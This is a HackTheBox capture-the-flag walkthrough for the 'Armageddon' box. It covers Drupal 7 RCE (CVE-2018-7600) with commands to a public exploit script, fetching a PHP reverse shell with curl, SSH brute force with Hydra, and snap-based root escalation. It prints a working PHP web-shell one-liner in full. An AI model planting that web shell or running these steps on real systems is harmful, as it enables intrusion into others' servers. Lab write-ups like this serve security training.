HackTheBox – Armageddon

Overview

Pretty simple box. Learn about Drupal exploits, ssh brute force, and snap privilege escalation.

Solution

Recon

Nmap

FIrst nmap the target. Got port 22 and 80 open.

Try SSH to the box. SSH banner reveals no useful information.

在这里插入图片描述

Websiite

Checkout the website. I tried to use single quote in the login form to test for sqli, but none is working. And the source code has no useful information either.

在这里插入图片描述

Wappalyzer showed the website is using drupal, the version was 7.
在这里插入图片描述

Gobuster

Since I cannot take advantage of the login form, and the source code is not helping. I tried to gobuster the website. I found the following hidden directories.

在这里插入图片描述

Manually browsed each. And in /modules/file/file.info, I found something interesting.

在这里插入图片描述

It revealed the version of drupal which was used by the website.

Searched for drupal 7.56 exploits showed that the target software was vulnerable to RCE, logged as CVE-2018-7600.

And PoC can be downloaded from ExploitDB. But the ruby one was not helping at all. I used the python exploit from github.

Foothold

CVE-2018-7600

The vulnerability was caused by drupal form API’s renderable arrays. Details can be found here.

And this drupal doc can help clarify things up a lot more.

So, fire up the script.

python scirpt.py -c whoami http://arma.none.thm

Got the result.

在这里插入图片描述

RCE confirmed.

Check if nc is present.

python scirpt.py -c "which nc" http://arma.none.thm

Netcat is not installed.

Check python, and bash. They are installed.

在这里插入图片描述
在这里插入图片描述

But bash reverse shell and python reverse shell both failed. I think it may be because I didn’t encode the special characters. Let me worry about it later.

I checked, wget was not installed. But curl was there. So host a php reverse shell and download it to the target machine. Since I’m apache, I can write to html folder.

在这里插入图片描述

在这里插入图片描述

Using curl to download the php-reverse-shell.php file from my machine. Remember to change IP and port in the file.

在这里插入图片描述

Run ls -al to confirm that the file is there.
在这里插入图片描述

Request the file in browser to get a reverse shell.

Got error.
在这里插入图片描述

I should probably get a cmd shell in the browser first.

Put this one-liner in a script file, then download it int the target machine.


<?php if (isset($_GET['cmd'])){$cmd = $_GET['cmd'];echo '<pre>';$result = shell_exec($cmd);echo $result;echo '</pre>';}?>

在这里插入图片描述

Verify the file.

在这里插入图片描述

Now I can execute command in the browser.

在这里插入图片描述

And then, I tried a lot of things. PHP meterpreter reverse shell and linux meterpreter reverse shell with msfvenom, but all failed.

Seems like user apache cannot run anything else on the system.

A little note here. when issuing chmod +x command, remember to encode the + sign to %2B because + is considered a space in url.

![在这里插入图片描述](https://img-blog.csdnimg.cn/20210629100302794.png![在这里插入图片描述](https://img-blog.csdnimg.cn/20210629112123556.png)

Nothing’s working here. I cannot get a bind shell either if I cannot run any payload on the system.

Last resort, brute force. Check /etc/password, I found the user, and judging by the name, he may be the admin of the system.

在这里插入图片描述

Hydra

Hydra the system with username brucetherealadmin.

在这里插入图片描述
🙂 Found ssh credential.

Privilege Escalation

id the user reals that he’s not root yet.

在这里插入图片描述
User can run the following command without password as root.

在这里插入图片描述
Search on GTFOBINS, this can be used to escalate our privilege.

在这里插入图片描述
I had to transfer the install file to my machine, and then package it to a snap file using fpm, then transfer it back.

Execute the command according to the above image, I got id run by root.

在这里插入图片描述

So, the idea is to change the COMMAND, and get the flag.

Change the COMMAND to ls /root, I got root.txt lying there.

在这里插入图片描述

Change it to cat /root/root.txt to get the flag.

在这里插入图片描述

Done!